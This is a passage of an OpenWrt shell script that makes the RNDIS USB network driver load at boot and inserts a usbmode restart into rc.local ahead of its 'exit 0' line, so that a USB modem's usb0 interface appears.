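# and run: sh awacs-bootfix.sh apply
ROOT="${ROOT:-}"   # empty means the real root filesystem

# 1. Make the rndis driver load at boot by linking its modules.d entry into
#    modules-boot.d, as the post does, but without failing on a second run.
#    A relative link target keeps the link valid under a scratch ROOT too.
ensure_rndis_boot_module() {
    src="$ROOT/etc/modules.d/usb-net-rndis"
    dst="$ROOT/etc/modules-boot.d/50-usb-net-rndis"
    if [ ! -e "$src" ]; then
        echo "missing $src: is kmod-usb-net-rndis installed?" >&2
        return 1
    fi
    mkdir -p "$ROOT/etc/modules-boot.d"
    [ -L "$dst" ] && return 0
    ln -s ../modules.d/usb-net-rndis "$dst"
}

# 2. Restart usbmode from rc.local so usb0 appears once the modem has powered
#    up. OpenWrt's stock rc.local ends in "exit 0", so the line must go before
#    it; appended after it, the command would never run.
ensure_usbmode_restart() {
    rc="$ROOT/etc/rc.local"
    line='/etc/init.d/usbmode restart'
    [ -f "$rc" ] || printf '#!/bin/sh\nexit 0\n' > "$rc"
    grep -qxF "$line" "$rc" && return 0
    if grep -qx 'exit 0' "$rc"; then
        awk -v l="$line" '$0 == "exit 0" && !done { print l; done = 1 } { print }' \
            "$rc" > "$rc.tmp" && cat "$rc.tmp" > "$rc" && rm -f "$rc.tmp"
    else
        echo "$line" >> "$rc"
    fi
}

apply_fixes() {
    ensure_rndis_boot_module && ensure_usbmode_restart
}

if [ "${1:-}" = "apply" ]; then
    apply_fixes
fi
```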